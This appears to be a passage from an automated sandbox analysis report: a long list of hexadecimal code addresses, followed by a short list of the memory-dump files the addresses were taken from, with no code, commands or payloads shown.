                                                                                                                                                                                      0x00406b44
                                                                                                                                                                                      0x00406b47
                                                                                                                                                                                      0x00406b4d
                                                                                                                                                                                      0x00406b4f
                                                                                                                                                                                      0x00406b4f
                                                                                                                                                                                      0x00406b52
                                                                                                                                                                                      0x00406b55
                                                                                                                                                                                      0x00406b57
                                                                                                                                                                                      0x00406b58
                                                                                                                                                                                      0x00406b5b
                                                                                                                                                                                      0x00406bc8
                                                                                                                                                                                      0x00406bc8
                                                                                                                                                                                      0x00406bcc
                                                                                                                                                                                      0x00406bcf
                                                                                                                                                                                      0x00406bd2
                                                                                                                                                                                      0x00406bd5
                                                                                                                                                                                      0x00406bd8
                                                                                                                                                                                      0x00406bd9
                                                                                                                                                                                      0x00406bdc
                                                                                                                                                                                      0x00406bde
                                                                                                                                                                                      0x00406be4
                                                                                                                                                                                      0x00406be7
                                                                                                                                                                                      0x00406bea
                                                                                                                                                                                      0x00406bed
                                                                                                                                                                                      0x00406bf0
                                                                                                                                                                                      0x00406bf6
                                                                                                                                                                                      0x00406c12
                                                                                                                                                                                      0x00406c15
                                                                                                                                                                                      0x00406c18
                                                                                                                                                                                      0x00406c1b
                                                                                                                                                                                      0x00406c22
                                                                                                                                                                                      0x00406c28
                                                                                                                                                                                      0x00406c2c
                                                                                                                                                                                      0x00406bf8
                                                                                                                                                                                      0x00406bf8
                                                                                                                                                                                      0x00406bfc
                                                                                                                                                                                      0x00406c04
                                                                                                                                                                                      0x00406c09
                                                                                                                                                                                      0x00406c0b
                                                                                                                                                                                      0x00406c0d
                                                                                                                                                                                      0x00406c0d
                                                                                                                                                                                      0x00406c36
                                                                                                                                                                                      0x00406c39
                                                                                                                                                                                      0x00406bb0
                                                                                                                                                                                      0x00406bb0
                                                                                                                                                                                      0x00406bb6
                                                                                                                                                                                      0x00406c69
                                                                                                                                                                                      0x00406c6f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c71
                                                                                                                                                                                      0x00406c74
                                                                                                                                                                                      0x00406c77
                                                                                                                                                                                      0x00406c7a
                                                                                                                                                                                      0x00406c7d
                                                                                                                                                                                      0x00406c80
                                                                                                                                                                                      0x00406c83
                                                                                                                                                                                      0x00406c86
                                                                                                                                                                                      0x00406c89
                                                                                                                                                                                      0x00406c8f
                                                                                                                                                                                      0x00406ca7
                                                                                                                                                                                      0x00406caa
                                                                                                                                                                                      0x00406cad
                                                                                                                                                                                      0x00406cb0
                                                                                                                                                                                      0x00406cb0
                                                                                                                                                                                      0x00406cb3
                                                                                                                                                                                      0x00406cb9
                                                                                                                                                                                      0x00406c91
                                                                                                                                                                                      0x00406c91
                                                                                                                                                                                      0x00406c99
                                                                                                                                                                                      0x00406c9e
                                                                                                                                                                                      0x00406ca0
                                                                                                                                                                                      0x00406ca2
                                                                                                                                                                                      0x00406ca2
                                                                                                                                                                                      0x00406cc3
                                                                                                                                                                                      0x00406cc6
                                                                                                                                                                                      0x00406c44
                                                                                                                                                                                      0x00406c48
                                                                                                                                                                                      0x00407308
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407308
                                                                                                                                                                                      0x00406c4e
                                                                                                                                                                                      0x00406c51
                                                                                                                                                                                      0x00406c54
                                                                                                                                                                                      0x00406c58
                                                                                                                                                                                      0x00406c5b
                                                                                                                                                                                      0x00406c61
                                                                                                                                                                                      0x00406c63
                                                                                                                                                                                      0x00406c63
                                                                                                                                                                                      0x00406c66
                                                                                                                                                                                      0x00406c66
                                                                                                                                                                                      0x00406cc6
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00406ccd
                                                                                                                                                                                      0x00406cd1
                                                                                                                                                                                      0x00406cd1
                                                                                                                                                                                      0x00406cd4
                                                                                                                                                                                      0x00406cd7
                                                                                                                                                                                      0x00406cdb
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407320
                                                                                                                                                                                      0x00406ce1
                                                                                                                                                                                      0x00406ce4
                                                                                                                                                                                      0x00406ce7
                                                                                                                                                                                      0x00406cea
                                                                                                                                                                                      0x00406ced
                                                                                                                                                                                      0x00406cf0
                                                                                                                                                                                      0x00406cf3
                                                                                                                                                                                      0x00406cf5
                                                                                                                                                                                      0x00406cf8
                                                                                                                                                                                      0x00406cfb
                                                                                                                                                                                      0x00406cfe
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406d00
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00406e9d
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406ea0
                                                                                                                                                                                      0x00406bc2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406c3f
                                                                                                                                                                                      0x00406b8b
                                                                                                                                                                                      0x00406b8f
                                                                                                                                                                                      0x004072fc
                                                                                                                                                                                      0x00407378
                                                                                                                                                                                      0x00407380
                                                                                                                                                                                      0x00407387
                                                                                                                                                                                      0x00407389
                                                                                                                                                                                      0x00407390
                                                                                                                                                                                      0x00407394
                                                                                                                                                                                      0x00407394
                                                                                                                                                                                      0x00406b95
                                                                                                                                                                                      0x00406b98
                                                                                                                                                                                      0x00406b9b
                                                                                                                                                                                      0x00406b9f
                                                                                                                                                                                      0x00406ba2
                                                                                                                                                                                      0x00406ba8
                                                                                                                                                                                      0x00406baa
                                                                                                                                                                                      0x00406baa
                                                                                                                                                                                      0x00406bad
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406bad
                                                                                                                                                                                      0x00406c39
                                                                                                                                                                                      0x00406b42
                                                                                                                                                                                      0x00406976
                                                                                                                                                                                      0x00406976
                                                                                                                                                                                      0x0040697f
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040738d
                                                                                                                                                                                      0x00406985
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406990
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406999
                                                                                                                                                                                      0x0040699c
                                                                                                                                                                                      0x0040699f
                                                                                                                                                                                      0x004069a3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004069a9
                                                                                                                                                                                      0x004069ac
                                                                                                                                                                                      0x004069ae
                                                                                                                                                                                      0x004069af
                                                                                                                                                                                      0x004069b2
                                                                                                                                                                                      0x004069b4
                                                                                                                                                                                      0x004069b5
                                                                                                                                                                                      0x004069b7
                                                                                                                                                                                      0x004069ba
                                                                                                                                                                                      0x004069bf
                                                                                                                                                                                      0x004069c4
                                                                                                                                                                                      0x004069cd
                                                                                                                                                                                      0x004069e0
                                                                                                                                                                                      0x004069e3
                                                                                                                                                                                      0x004069ef
                                                                                                                                                                                      0x00406a17
                                                                                                                                                                                      0x00406a19
                                                                                                                                                                                      0x00406a27
                                                                                                                                                                                      0x00406a27
                                                                                                                                                                                      0x00406a2b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a1b
                                                                                                                                                                                      0x00406a1b
                                                                                                                                                                                      0x00406a1e
                                                                                                                                                                                      0x00406a1f
                                                                                                                                                                                      0x00406a1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a1b
                                                                                                                                                                                      0x004069f5
                                                                                                                                                                                      0x004069fa
                                                                                                                                                                                      0x004069fa
                                                                                                                                                                                      0x00406a03
                                                                                                                                                                                      0x00406a0b
                                                                                                                                                                                      0x00406a0e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a14
                                                                                                                                                                                      0x00406a14
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a14
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a31
                                                                                                                                                                                      0x00406a31
                                                                                                                                                                                      0x00406a35
                                                                                                                                                                                      0x004072e1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072e1
                                                                                                                                                                                      0x00406a3e
                                                                                                                                                                                      0x00406a4e
                                                                                                                                                                                      0x00406a51
                                                                                                                                                                                      0x00406a54
                                                                                                                                                                                      0x00406a54
                                                                                                                                                                                      0x00406a54
                                                                                                                                                                                      0x00406a57
                                                                                                                                                                                      0x00406a5b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a5d
                                                                                                                                                                                      0x00406a63
                                                                                                                                                                                      0x00406a8d
                                                                                                                                                                                      0x00406a93
                                                                                                                                                                                      0x00406a9a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406a9a
                                                                                                                                                                                      0x00406a69
                                                                                                                                                                                      0x00406a6c
                                                                                                                                                                                      0x00406a71
                                                                                                                                                                                      0x00406a71
                                                                                                                                                                                      0x00406a7c
                                                                                                                                                                                      0x00406a84
                                                                                                                                                                                      0x00406a87
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406acc
                                                                                                                                                                                      0x00406ad2
                                                                                                                                                                                      0x00406ad5
                                                                                                                                                                                      0x00406ae2
                                                                                                                                                                                      0x00406aea
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406aa1
                                                                                                                                                                                      0x00406aa1
                                                                                                                                                                                      0x00406aa5
                                                                                                                                                                                      0x004072f0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072f0
                                                                                                                                                                                      0x00406ab1
                                                                                                                                                                                      0x00406abc
                                                                                                                                                                                      0x00406abc
                                                                                                                                                                                      0x00406abc
                                                                                                                                                                                      0x00406abf
                                                                                                                                                                                      0x00406ac2
                                                                                                                                                                                      0x00406ac5
                                                                                                                                                                                      0x00406aca
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d91
                                                                                                                                                                                      0x00406d95
                                                                                                                                                                                      0x00406db3
                                                                                                                                                                                      0x00406db6
                                                                                                                                                                                      0x00406dbd
                                                                                                                                                                                      0x00406dc0
                                                                                                                                                                                      0x00406dc3
                                                                                                                                                                                      0x00406dc6
                                                                                                                                                                                      0x00406dc9
                                                                                                                                                                                      0x00406dcc
                                                                                                                                                                                      0x00406dce
                                                                                                                                                                                      0x00406dd5
                                                                                                                                                                                      0x00406dd6
                                                                                                                                                                                      0x00406dd8
                                                                                                                                                                                      0x00406ddb
                                                                                                                                                                                      0x00406dde
                                                                                                                                                                                      0x00406de1
                                                                                                                                                                                      0x00406de1
                                                                                                                                                                                      0x00406de6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406de6
                                                                                                                                                                                      0x00406d97
                                                                                                                                                                                      0x00406d9a
                                                                                                                                                                                      0x00406d9d
                                                                                                                                                                                      0x00406da7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406dfb
                                                                                                                                                                                      0x00406dff
                                                                                                                                                                                      0x00406e22
                                                                                                                                                                                      0x00406e25
                                                                                                                                                                                      0x00406e28
                                                                                                                                                                                      0x00406e32
                                                                                                                                                                                      0x00406e01
                                                                                                                                                                                      0x00406e01
                                                                                                                                                                                      0x00406e04
                                                                                                                                                                                      0x00406e07
                                                                                                                                                                                      0x00406e0a
                                                                                                                                                                                      0x00406e17
                                                                                                                                                                                      0x00406e1a
                                                                                                                                                                                      0x00406e1a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e3e
                                                                                                                                                                                      0x00406e42
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e48
                                                                                                                                                                                      0x00406e4c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e52
                                                                                                                                                                                      0x00406e54
                                                                                                                                                                                      0x00406e58
                                                                                                                                                                                      0x00406e58
                                                                                                                                                                                      0x00406e5b
                                                                                                                                                                                      0x00406e5f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406eaf
                                                                                                                                                                                      0x00406eb3
                                                                                                                                                                                      0x00406eba
                                                                                                                                                                                      0x00406ebd
                                                                                                                                                                                      0x00406ec0
                                                                                                                                                                                      0x00406eca
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406eca
                                                                                                                                                                                      0x00406eb5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406ed6
                                                                                                                                                                                      0x00406eda
                                                                                                                                                                                      0x00406ee1
                                                                                                                                                                                      0x00406ee4
                                                                                                                                                                                      0x00406ee7
                                                                                                                                                                                      0x00406edc
                                                                                                                                                                                      0x00406edc
                                                                                                                                                                                      0x00406edc
                                                                                                                                                                                      0x00406eea
                                                                                                                                                                                      0x00406eed
                                                                                                                                                                                      0x00406ef0
                                                                                                                                                                                      0x00406ef0
                                                                                                                                                                                      0x00406ef3
                                                                                                                                                                                      0x00406ef6
                                                                                                                                                                                      0x00406ef9
                                                                                                                                                                                      0x00406ef9
                                                                                                                                                                                      0x00406efc
                                                                                                                                                                                      0x00406f03
                                                                                                                                                                                      0x00406f08
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f96
                                                                                                                                                                                      0x00406f96
                                                                                                                                                                                      0x00406f9a
                                                                                                                                                                                      0x00407338
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407338
                                                                                                                                                                                      0x00406fa0
                                                                                                                                                                                      0x00406fa3
                                                                                                                                                                                      0x00406fa6
                                                                                                                                                                                      0x00406faa
                                                                                                                                                                                      0x00406fad
                                                                                                                                                                                      0x00406fb3
                                                                                                                                                                                      0x00406fb5
                                                                                                                                                                                      0x00406fb5
                                                                                                                                                                                      0x00406fb5
                                                                                                                                                                                      0x00406fb8
                                                                                                                                                                                      0x00406fbb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407019
                                                                                                                                                                                      0x00407019
                                                                                                                                                                                      0x0040701d
                                                                                                                                                                                      0x00407344
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407344
                                                                                                                                                                                      0x00407023
                                                                                                                                                                                      0x00407026
                                                                                                                                                                                      0x00407029
                                                                                                                                                                                      0x0040702d
                                                                                                                                                                                      0x00407030
                                                                                                                                                                                      0x00407036
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x00407038
                                                                                                                                                                                      0x0040703b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406de9
                                                                                                                                                                                      0x00406de9
                                                                                                                                                                                      0x00406dec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407128
                                                                                                                                                                                      0x0040712c
                                                                                                                                                                                      0x0040714e
                                                                                                                                                                                      0x00407151
                                                                                                                                                                                      0x0040715b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040715b
                                                                                                                                                                                      0x0040712e
                                                                                                                                                                                      0x00407131
                                                                                                                                                                                      0x00407135
                                                                                                                                                                                      0x00407138
                                                                                                                                                                                      0x00407138
                                                                                                                                                                                      0x0040713b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071e5
                                                                                                                                                                                      0x004071e9
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x00407207
                                                                                                                                                                                      0x0040720e
                                                                                                                                                                                      0x00407215
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040721c
                                                                                                                                                                                      0x004071eb
                                                                                                                                                                                      0x004071ee
                                                                                                                                                                                      0x004071f1
                                                                                                                                                                                      0x004071f4
                                                                                                                                                                                      0x004071fb
                                                                                                                                                                                      0x0040713f
                                                                                                                                                                                      0x0040713f
                                                                                                                                                                                      0x00407142
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072d6
                                                                                                                                                                                      0x004072d9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f10
                                                                                                                                                                                      0x00406f12
                                                                                                                                                                                      0x00406f19
                                                                                                                                                                                      0x00406f1a
                                                                                                                                                                                      0x00406f1c
                                                                                                                                                                                      0x00406f1f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f27
                                                                                                                                                                                      0x00406f2a
                                                                                                                                                                                      0x00406f2d
                                                                                                                                                                                      0x00406f2f
                                                                                                                                                                                      0x00406f31
                                                                                                                                                                                      0x00406f31
                                                                                                                                                                                      0x00406f32
                                                                                                                                                                                      0x00406f35
                                                                                                                                                                                      0x00406f3c
                                                                                                                                                                                      0x00406f3f
                                                                                                                                                                                      0x00406f4d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407223
                                                                                                                                                                                      0x00407223
                                                                                                                                                                                      0x00407226
                                                                                                                                                                                      0x0040722d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407232
                                                                                                                                                                                      0x00407232
                                                                                                                                                                                      0x00407236
                                                                                                                                                                                      0x0040736e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040736e
                                                                                                                                                                                      0x0040723c
                                                                                                                                                                                      0x0040723f
                                                                                                                                                                                      0x00407242
                                                                                                                                                                                      0x00407246
                                                                                                                                                                                      0x00407249
                                                                                                                                                                                      0x0040724f
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407251
                                                                                                                                                                                      0x00407254
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x00407257
                                                                                                                                                                                      0x0040725a
                                                                                                                                                                                      0x0040725a
                                                                                                                                                                                      0x0040725e
                                                                                                                                                                                      0x004072be
                                                                                                                                                                                      0x004072c1
                                                                                                                                                                                      0x004072c6
                                                                                                                                                                                      0x004072c7
                                                                                                                                                                                      0x004072c9
                                                                                                                                                                                      0x004072cb
                                                                                                                                                                                      0x004072ce
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072ce
                                                                                                                                                                                      0x00407260
                                                                                                                                                                                      0x00407266
                                                                                                                                                                                      0x00407269
                                                                                                                                                                                      0x0040726c
                                                                                                                                                                                      0x0040726f
                                                                                                                                                                                      0x00407272
                                                                                                                                                                                      0x00407275
                                                                                                                                                                                      0x00407278
                                                                                                                                                                                      0x0040727b
                                                                                                                                                                                      0x0040727e
                                                                                                                                                                                      0x00407281
                                                                                                                                                                                      0x0040729a
                                                                                                                                                                                      0x0040729d
                                                                                                                                                                                      0x004072a0
                                                                                                                                                                                      0x004072a3
                                                                                                                                                                                      0x004072a7
                                                                                                                                                                                      0x004072a9
                                                                                                                                                                                      0x004072a9
                                                                                                                                                                                      0x004072aa
                                                                                                                                                                                      0x004072ad
                                                                                                                                                                                      0x00407283
                                                                                                                                                                                      0x00407283
                                                                                                                                                                                      0x0040728b
                                                                                                                                                                                      0x00407290
                                                                                                                                                                                      0x00407292
                                                                                                                                                                                      0x00407295
                                                                                                                                                                                      0x00407295
                                                                                                                                                                                      0x004072b0
                                                                                                                                                                                      0x004072b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072b9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004072b9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406f55
                                                                                                                                                                                      0x00406f58
                                                                                                                                                                                      0x00406f8e
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070be
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c1
                                                                                                                                                                                      0x004070c4
                                                                                                                                                                                      0x004070c6
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407350
                                                                                                                                                                                      0x004070cc
                                                                                                                                                                                      0x004070cf
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070d5
                                                                                                                                                                                      0x004070d9
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070dc
                                                                                                                                                                                      0x00406f5a
                                                                                                                                                                                      0x00406f5c
                                                                                                                                                                                      0x00406f5e
                                                                                                                                                                                      0x00406f60
                                                                                                                                                                                      0x00406f63
                                                                                                                                                                                      0x00406f64
                                                                                                                                                                                      0x00406f66
                                                                                                                                                                                      0x00406f68
                                                                                                                                                                                      0x00406f6b
                                                                                                                                                                                      0x00406f6e
                                                                                                                                                                                      0x00406f84
                                                                                                                                                                                      0x00406f89
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc1
                                                                                                                                                                                      0x00406fc5
                                                                                                                                                                                      0x00406ff1
                                                                                                                                                                                      0x00406ff3
                                                                                                                                                                                      0x00406ffa
                                                                                                                                                                                      0x00406ffd
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407000
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407005
                                                                                                                                                                                      0x00407007
                                                                                                                                                                                      0x0040700a
                                                                                                                                                                                      0x00407011
                                                                                                                                                                                      0x00407014
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407041
                                                                                                                                                                                      0x00407044
                                                                                                                                                                                      0x00407047
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070bb
                                                                                                                                                                                      0x00407049
                                                                                                                                                                                      0x0040704f
                                                                                                                                                                                      0x00407052
                                                                                                                                                                                      0x00407055
                                                                                                                                                                                      0x00407058
                                                                                                                                                                                      0x0040705b
                                                                                                                                                                                      0x0040705e
                                                                                                                                                                                      0x00407061
                                                                                                                                                                                      0x00407064
                                                                                                                                                                                      0x00407067
                                                                                                                                                                                      0x0040706a
                                                                                                                                                                                      0x00407083
                                                                                                                                                                                      0x00407085
                                                                                                                                                                                      0x00407088
                                                                                                                                                                                      0x00407089
                                                                                                                                                                                      0x0040708c
                                                                                                                                                                                      0x0040708e
                                                                                                                                                                                      0x00407091
                                                                                                                                                                                      0x00407093
                                                                                                                                                                                      0x00407095
                                                                                                                                                                                      0x00407098
                                                                                                                                                                                      0x0040709a
                                                                                                                                                                                      0x0040709d
                                                                                                                                                                                      0x004070a1
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a3
                                                                                                                                                                                      0x004070a4
                                                                                                                                                                                      0x004070a7
                                                                                                                                                                                      0x004070aa
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x0040706c
                                                                                                                                                                                      0x00407074
                                                                                                                                                                                      0x00407079
                                                                                                                                                                                      0x0040707b
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x0040707e
                                                                                                                                                                                      0x004070ad
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x0040703e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070b6
                                                                                                                                                                                      0x004070b4
                                                                                                                                                                                      0x00406fc7
                                                                                                                                                                                      0x00406fca
                                                                                                                                                                                      0x00406fcc
                                                                                                                                                                                      0x00406fcf
                                                                                                                                                                                      0x00406fd2
                                                                                                                                                                                      0x00406fd5
                                                                                                                                                                                      0x00406fd7
                                                                                                                                                                                      0x00406fda
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fdd
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe0
                                                                                                                                                                                      0x00406fe3
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00406fbe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406fec
                                                                                                                                                                                      0x00406fea
                                                                                                                                                                                      0x00406f70
                                                                                                                                                                                      0x00406f73
                                                                                                                                                                                      0x00406f75
                                                                                                                                                                                      0x00406f78
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e62
                                                                                                                                                                                      0x00406e66
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040732c
                                                                                                                                                                                      0x00406e6c
                                                                                                                                                                                      0x00406e6f
                                                                                                                                                                                      0x00406e72
                                                                                                                                                                                      0x00406e75
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e77
                                                                                                                                                                                      0x00406e7a
                                                                                                                                                                                      0x00406e7d
                                                                                                                                                                                      0x00406e80
                                                                                                                                                                                      0x00406e83
                                                                                                                                                                                      0x00406e86
                                                                                                                                                                                      0x00406e89
                                                                                                                                                                                      0x00406e8a
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8c
                                                                                                                                                                                      0x00406e8f
                                                                                                                                                                                      0x00406e92
                                                                                                                                                                                      0x00406e95
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e98
                                                                                                                                                                                      0x00406e9b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070df
                                                                                                                                                                                      0x004070e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004070e9
                                                                                                                                                                                      0x004070ec
                                                                                                                                                                                      0x004070ef
                                                                                                                                                                                      0x004070f2
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f4
                                                                                                                                                                                      0x004070f7
                                                                                                                                                                                      0x004070fa
                                                                                                                                                                                      0x004070fd
                                                                                                                                                                                      0x00407100
                                                                                                                                                                                      0x00407103
                                                                                                                                                                                      0x00407106
                                                                                                                                                                                      0x00407107
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x00407109
                                                                                                                                                                                      0x0040710c
                                                                                                                                                                                      0x0040710f
                                                                                                                                                                                      0x00407112
                                                                                                                                                                                      0x00407115
                                                                                                                                                                                      0x00407118
                                                                                                                                                                                      0x0040711c
                                                                                                                                                                                      0x0040711e
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407123
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407123
                                                                                                                                                                                      0x00407121
                                                                                                                                                                                      0x00407356
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406985

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
